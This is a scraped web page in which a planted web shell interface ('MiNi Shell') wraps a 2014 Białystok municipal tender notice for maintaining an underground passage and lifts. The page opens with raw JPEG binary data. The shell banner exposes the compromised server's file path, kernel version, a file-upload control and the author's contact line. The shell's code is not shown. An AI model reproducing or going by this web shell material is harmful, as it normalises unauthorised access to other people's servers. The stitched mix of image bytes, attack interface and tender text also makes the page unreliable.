JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140321/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140321/96118-N-2014.html

<p class="kh_header"><b>Białystok: Kompleksowe utrzymanie przejścia podziemnego pod skrzyżowaniem 
ul. Sienkiewicza i Al. Piłsudskiego wraz z windami oraz 6-ciu wind w przejściach naziemnych przy ul. Gen. Andersa (4 szt.) i ul. Gen. Sosabowskiego (2 szt.)</b><br>
<b>Numer ogłoszenia: 96118 - 2014; data zamieszczenia: 21.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Białystok , ul. Słonimska 1, 15-950 Białystok, woj. podlaskie, tel. 085 869 60 02, faks 085 869 62 65.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowe utrzymanie przejścia podziemnego pod skrzyżowaniem 
ul. Sienkiewicza i Al. Piłsudskiego wraz z windami oraz 6-ciu wind w przejściach naziemnych przy ul. Gen. Andersa (4 szt.) i ul. Gen. Sosabowskiego (2 szt.).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest kompleksowe utrzymanie przejścia podziemnego pod skrzyżowaniem ul. Sienkiewicza i Al. Piłsudskiego wraz z windami oraz 6-ciu wind w przejściach naziemnych przy ul. Gen. Andersa (4 szt.) i ul. Gen. Sosabowskiego (2 szt.) w Białymstoku.
2.  Szczegółowy opis przedmiotu zamówienia:
1) Utrzymanie przejścia podziemnego pod skrzyżowaniem ul. Sienkiewicza 
i Al. Piłsudskiego, obejmujące: a) codzienne oczyszczanie przejścia wraz ze schodami, poręczami i pochylniami rowerowymi z wszelkich odpadów organicznych i nieorganicznych (np. z piasku, liści, stłuczonego szkła, folii, gum do żucia, itp.), a także ekskrementów.  Łączna powierzchnia do oczyszczania:   640 m 2 , w tym: 
- powierzchnia przejścia bez schodów (posadzka z kamienia, granitu grafitowego, mrozoodpornego, antypoślizgowego) - 480 m 2, 
- powierzchnia schodów (wykonanych z granitu grafitowego, mrozoodpornego, antypoślizgowego) - 160 m 2 ; b)  codzienne opróżnianie i utrzymanie w czystości koszy na śmieci zlokalizowanych na terenie obiektu (przewidywana ilość koszy w przejściu podziemnym - 2 szt.) - wywóz śmieci z opróżnionych śmietniczek na bieżąco, niedopuszczalne jest gromadzenie śmieci na terenie obiektu; przynajmniej raz na kwartał kosze należy umyć z użyciem środka dezynfekującego z zewnątrz i wewnątrz wkładów koszy oraz oczyścić zewnętrzną powierzchnię śmietniczki;
c)  usuwanie na bieżąco ogłoszeń, plakatów, ulotek, nalepek itp. (również z zadaszeń nad wejściami); d)  w okresie zimowym: odśnieżanie schodów o powierzchni 160 m 2 (wykonanych z granitu grafitowego, mrozoodpornego, antypoślizgowego), usuwanie błota pośniegowego, likwidacja śliskości na schodach i bezpośrednio przy wejściach do przejścia (przy pomocy środków chemicznych tj. chlorek magnezu lub wapnia w uzgodnieniu z Zamawiającym) - w momencie wystąpienia opadów śniegu lub/i gołoledzi - prace muszą zacząć się najpóźniej w 30 minut po wystąpieniu zjawiska i trwać do momentu uzyskania optymalnego stanu nawierzchni; e)  mycie zadaszeń wejść do przejścia wraz z podbudową przy użyciu delikatnych środków chemicznych nie powodujących ich uszkodzenia bądź zmatowienia z częstotliwością - maksymalnie 4 razy w ciągu obowiązywania umowy; należy zachować szczególną ostrożność ze względu na pracę na wysokości i urządzenia wrażliwe na zalanie (windy). 
Powierzchnia łączna zadaszeń nad przejściem oraz windami  (zadaszenia wejść: konstrukcja stalowa pokryta płytą z poliwęglanu litego, bezbarwnego, mocowanego w profilach systemowych; zadaszenia wind: szkło hartowane, laminowane, bezbarwne):   400 m 2. Powyższe prace będą zlecane protokołami konieczności i rozliczane ceną za jednorazowe mycie zadaszeń nad wejściami oraz windami.; f) mycie powierzchni poziomych granitowych przejścia wraz ze schodami mające na celu usunięcie wszelkich cieczy i ich pozostałości, w tym m.in. olejów, płynów, smarów, plam i innych zanieczyszczeń - stosowane środki chemiczne muszą być przyjazne dla środowiska oraz nie mogą powodować zmian struktury i właściwości fizyko-chemicznych materiałów, z których zostały wykonane, a sprzęt i narzędzia nie mogą w żaden sposób powodować niszczenia powierzchni (zaleca się stosowanie myjki ciśnieniowej lub innych urządzeń mechanicznych, które z racji na sposób działania i ciężar własny nie zniszczą obiektu oraz specjalistycznych preparatów do powierzchni granitowych) - maksymalnie 20 razy rocznie (maksymalnie 40 razy w ciągu obowiązywania umowy). Łączna powierzchnia do mycia:  640 m 2 , w tym: 
- powierzchnia przejścia bez schodów  (posadzka z kamienia, granitu grafitowego, mrozoodpornego, antypoślizgowego) - 480 m 2,  - powierzchnia schodów (wykonanych z granitu grafitowego, mrozoodpornego, antypoślizgowego) - 160 m 2 ; Powyższe prace będą zlecane protokołami konieczności i rozliczane ceną za jednorazowe mycie poziomych powierzchni granitowych.; 2) Utrzymanie wind w przejściu podziemnym pod skrzyżowaniem ul. Sienkiewicza i Al. Piłsudskiego (4 szt.), obejmujące: a) codzienne oczyszczanie wnętrza oraz przedsionków wind z wszelkich odpadów organicznych i nieorganicznych (np. z piasku, liści, stłuczonego szkła, folii, itp.), a także ekskrementów; dodatkowo w okresie jesienno-zimowym ręczne usuwanie wody, błota, błota pośniegowego z podłóg wind, naniesionej soli lub/i piasko-soli; Ilość wind w przejściu pod skrzyżowaniem ul. Sienkiewicza i Al. Piłsudskiego : 4 szt. - o łącznej powierzchni podłogi 6,16 m 2, (podłoga 1 windy o wymiarach: 110x140cm, wykonana z marmoleum czarnego, wysokość ok. 2m, drzwi przelotowe dwupanelowe; winda wykonana ze stali nierdzewnej wandaloodpornej);
b) usuwanie na bieżąco wszelkich wlepek, ogłoszeń, plakatów, naklejek z wnętrza wind oraz z ich drzwi zewnętrznych; c) dwa razy w tygodniu - umycie całego wnętrza wind (podłoga, ściany i drzwi ze stali nierdzewnej, sufit, futryna, elementy wejścia, prowadnice drzwi) przy pomocy delikatnych środków myjących, wypolerowanie umytych powierzchni, tak aby nie pozostały żadne smugi, umycie zewnętrznych powierzchni szybów wind (szkło), umycie drzwi do pomieszczeń gospodarczych zlokalizowanych przy windach; Łączna powierzchnia do mycia:  80,8 m2 , w tym: -  ilość wind w przejściu pod skrzyżowaniem ul. Sienkiewicza i Al. Piłsudskiego: 4  szt. o łącznej powierzchni 70 m2  (podłoga 1 windy o wymiarach: 110x140cm,   wykonana z marmoleum czarnego, wysokość ok. 2m, drzwi przelotowe dwupanelowe; winda wykonana ze stali nierdzewnej wandaloodpornej), -  ilość drzwi do pomieszczeń gospodarczych:  6 szt. o łącznej powierzchni 10,8 m2 (drzwi stalowe pełne o wymiarach: 90x200 cm, malowane proszkowo); 3) Utrzymanie wind w przejściach naziemnych na ul. Andersa
(4 szt.) i ul. Sosabowskiego (2 szt.), obejmujące: a) usuwanie na bieżąco wszelkich wlepek, ogłoszeń, plakatów, naklejek z wnętrza wind oraz z drzwi zewnętrznych; b) raz w tygodniu - oczyszczanie wnętrza wind z wszelkich odpadów organicznych i nieorganicznych (np. z piasku, liści, stłuczonego szkła, folii, itp.), a także ekskrementów; dodatkowo w okresie jesienno-zimowym ręczne usuwanie wody, błota, błota pośniegowego, naniesionej soli lub/i piasko-soli z podłóg wind; umycie całego wnętrza wind (podłoga, ściany, drzwi, sufit, futryna, elementy wejścia, prowadnice drzwi) przy pomocy delikatnych środków myjących, wypolerowanie umytych powierzchni, tak aby nie pozostały żadne smugi, umycie zewnętrznych powierzchni szybów wind; Łączna  powierzchnia   wind   do  oczyszczania:    105  m2 ,   (podłoga 1 windy  o wymiarach: 110  x  140cm, wykonana z marmoleum czarnego,   wysokość ok. 2m, drzwi przelotowe dwupanelowe; winda wykonana ze szkła hartowanego), w tym: - ilość wind w przejściu naziemnym przy ul. Andersa :    4 szt., - ilość wind w przejściu naziemnym przy ul. Sosabowskiego:  2 szt. 3.  Wykonawca przy realizacji zamówienia zobowiązany jest do: 1) używania bezpiecznych oraz certyfikowanych środków przy realizacji usług, Wszystkie środki, zarówno chemiczne jak i mechaniczne, użyte do prac muszą być stosowane zgodnie z przepisami prawa, posiadać odpowiednie certyfikaty i dokumenty dopuszczające do ich stosowania na terenie Polski i Unii Europejskiej. Materiały i środki używane do czyszczenia mają być dostosowane do rodzaju czyszczonej powierzchni i stosowane zgodnie z zaleceniami producenta oraz mają nie niszczyć czyszczonej powierzchni oraz nie zmieniać jej właściwości fizyko-chemicznych; 2) zabezpieczania terenu w przypadku występowania zagrożeń wynikających ze zmiany właściwości nawierzchni,  W ramach wykonywanych czynności, powodujących zmianę właściwości nawierzchni lub po stwierdzeniu jej wystąpienia (np. zwiększenie śliskości), Wykonawca ma obowiązek zabezpieczyć teren, na którym prace będą prowadzone oraz teren, który jest zagrożony skutkami wykonywania tych prac lub na którym nastąpiła zmiana właściwości nawierzchni, przez wystawienie odpowiednich stojaków informacyjnych lub wygrodzenie zagrożonego obszaru do czasu ustąpienia zagrożenia. Wykonawca wystawia odpowiednie stojaki informacyjne w porozumieniu z Zamawiającym; 3) używania maszyn nie powodujących niedogodności dla ciągłego ruchu pieszych, Zakazuje się używania maszyn do zdmuchiwania zanieczyszczeń (dmuchaw) ze względu na ciągły ruch pieszych. Stosowanie tego typu urządzeń skutkować będzie naliczeniem kar umownych z tytułu nienależytego wykonania prac objętych ryczałtowym, miesięcznym utrzymaniem, zgodnie z zapisami umowy.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.62.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.04.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia:
1) każdy Wykonawca zobowiązany jest złożyć oddzielnie dokumenty określone w sekcji III.4.2) tiret 2 oraz sekcji III.4.4) tiret 1; 2) oświadczenie o spełnieniu warunków udziału w postępowaniu określone w sekcji III.4.1) oraz oświadczenie o nie podleganiu wykluczeniu określone w sekcji III.4.2) tiret 1 składa pełnomocnik Wykonawców wspólnie ubiegających się o udzielenie zamówienia w ich imieniu bądź każdy z Wykonawców oddzielnie. 
2. Dokumenty podmiotów zagranicznych: 1) jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w sekcji III.4.3.1) tiret 1, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także
osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem, 2) dokument, o którym mowa w sekcji III.4.3.1) lub zastępujący go dokument, o którym mowa w ppkt 1, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 3) w przypadku wątpliwości, co do treści dokumentu złożonego przez Wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Zamawiający może zwrócić się do właściwych organów odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Białymstoku, Departament Ochrony Środowiska i Gospodarki Komunalnej, ul. J.K. Branickiego 9, 15-950 Białystok, pok. 117.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.03.2014 godzina 09:45, miejsce: Urząd Miejski w Białymstoku, Departament Ochrony Środowiska i Gospodarki Komunalnej, ul. J.K. Branickiego 9, 15-950 Białystok, pok. 304.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com